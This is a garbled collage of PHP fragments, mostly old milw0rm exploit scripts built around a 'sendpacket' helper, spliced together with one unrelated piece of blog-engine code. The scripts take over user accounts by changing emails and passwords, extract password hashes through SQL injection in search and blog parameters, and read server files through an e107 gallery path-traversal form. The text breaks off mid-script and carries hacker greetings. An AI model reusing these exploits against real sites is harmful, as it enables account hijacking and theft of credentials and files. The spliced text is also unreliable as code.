sendpacket($packet2);
if (stristr($html, 'i=1') == true) {
die('Error : Incorrect username or password! Try
again!');
} else {
if (stristr($html, 'i=5') == true) {
die('Error : Someone is currently using that account!');
} else {
$RandMail = substr($PHPSESSID, 10, 6) . '*****@*****.**';
}
}
$Query3 = $path . 'index.php?n=modules/panel&a=2&tmp[authorization]=4';
$packet3 = "POST \n{$Query3}&editpassword=&editpassword2=&editemail={$RandMail}&edittemplate=default&editurl=&editflag=none&editday=0&editmonth=0&edityear=0&edithideemail=0&editcalendarbday=0&editmsn=&edityahoo=&editicq=&editaim=&editskype=&editsignature=&editaboutme=&PHPSESSID={$PHPSESSID} \nHTTP/1.1\r\n";
$packet3 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet3 .= "Host: " . $host . "\r\n";
$packet3 .= "Connection: Close\r\n\r\n";
sendpacket($packet3);
if (stristr($html, 'i=26') == false) {
die('Exploit Failed');
}
$Query4 = $path . 'index.php?n=modules/login&a=1';
$packet4 = "POST {$Query4}&PHPSESSID={$PHPSESSID} HTTP/1.1\r\n";
$packet4 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet4 .= "Host: " . $host . "\r\n";
$packet4 .= "Connection: Close\r\n\r\n";
sendpacket($packet4);
die('Exploit succeeded! You have Full access now!');
}
?>
-----------------------------7d6224c08dc Content-Disposition: form-data; name="State" aaaaaa -----------------------------7d6224c08dc Content-Disposition: form-data; name="Country" Iran -----------------------------7d6224c08dc Content-Disposition: form-data; name="Status" Active -----------------------------7d6224c08dc '; echo "Powered By Y! Underground Group\r\n"; echo "discovered&Coded By Dj7xpl\r\n"; echo "Sending Data To Target ...\n"; /*Sending Data*/ $packet = "POST " . $p . "admin/editusers.php?Uid=" . $uid . " HTTP/1.0\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacket($packet); sleep(1); echo "Change Passw0rd Now!\n"; ?> # milw0rm.com [2007-04-30]
$sql = " FROM forum_userdata WHERE user_name='" . $username . "'/*";
$sql = urlencode($sql);
if ($proxy == '') {
$packet = "GET " . $path . "search.php?search=" . $sql . "&ao=phrase HTTP/1.1\r\n";
} else {
$packet = "GET http://" . $host . $path . "search.php?search=" . $sql . "&ao=phrase HTTP/1.1\r\n";
}
$packet .= "Client-IP: 127.0.0.1\r\n";
$packet .= "X-Forwarded-For: 127.0.0.1\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet .= "Referer: http://" . $host . $path . "search.php\r\n";
$packet .= "Accept-Language: en\r\n";
$packet .= "Accept-Encoding: gzip, deflate\r\n";
$packet .= "User-Agent: Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Keep-Alive\r\n\r\n";
show($packet);
sendpacket($packet, 0);
$temp = explode(';<span class="category">(', $html);
$temp2 = explode(')</span>', $temp[1]);
$hash = $temp2[0];
echo '<br>username: '******' hash: ' . $hash;
# debugging...
//echo htmlentities($html);
} else {
echo '<br>fill in all requested fields, optionally specify a proxy...<br>';
}
?>
# milw0rm.com [2005-09-22]
function getlogindetails($p, $msg, $tsqli)
{
echo $msg;
$tempvar = "";
$j = 1;
while (!strstr($tempvar, chr(0))) {
for ($i = 1; $i <= 126; $i++) {
if (!strpos($tsqli, "load_file") == true) {
$sqli = $tsqli . "+limit+0,1)," . $j . ",1))='" . $i;
} else {
$sqli = $tsqli . ")," . $j . ",1))='" . $i;
}
$packet = "GET " . $p . "index.php?cmd=blog&post=1" . $sqli . " HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$html = sendpacket($packet);
if (strlen($html) > 429) {
echo chr($i);
break;
} elseif ($i === 126) {
$tempvar .= "";
break;
}
}
$j++;
}
}
$DB->unbuffered_query("UPDATE {$db_prefix}statistics SET article_count=article_count" . $query . "1");
$DB->unbuffered_query("UPDATE {$db_prefix}users SET articles=articles" . $query . "1 WHERE userid='{$sax_uid}'");
}
archives_recache();
hottags_recache();
categories_recache();
statistics_recache();
newarticles_recache();
if ($pingurl && $pingagain) {
$pingurldb = explode("\n", $pingurl);
foreach ($pingurldb as $pingurl) {
$pingurl = trim($pingurl);
if ($pingurl) {
$url = str_replace('show&id', 'show&id', getpermalink($article['articleid'], $article['alias']));
$data = 'url=' . rawurlencode($url) . '&title=' . rawurlencode($article['title']) . '&blog_name=' . rawurlencode($options['name']) . '&excerpt=' . rawurlencode($article['content']);
$result = sendpacket($pingurl, $data);
/*
if (strpos($result, 'error>0</error')) {
//succ
} else {
//fa
}*/
}
}
}
if ($article['stick'] != $stick) {
stick_recache();
}
$location = getlink('article', 'mod', array('message' => 13, 'articleid' => $articleid));
}
header("Location: {$location}");
[o] Greetz [o]
==============
MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
F**K TERORIS!!
*/
$vuln = '/e107_plugins/my_gallery/image.php?file=';
$trasv = '/../../../../../../../../../../../../../../..';
echo "<form method=POST>\nWeb 2 XPL : <input type=\"text\" name=\"host\" size=30>\nFile 2 Read : <input type=\"text\" name=\"file\" size=30>\n<input type=submit value=\"Go!!!\" name=\"_xpl\">\n<br><br>";
if ($_POST['_xpl']) {
$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "Connection: close\r\n\r\n";
$html = sendpacket($host, $data);
print '<pre>' . htmlspecialchars($html) . '</pre>';
}
echo "</form>";
function sendpacket($host, $data)
{
if (!($sock = @fsockopen($host, 80))) {
die("[!] Connection refused, try again!\n");
}
fputs($sock, $data);
while (!feof($sock)) {
$html .= fgets($sock);
}
fclose($sock);
return $html;
}
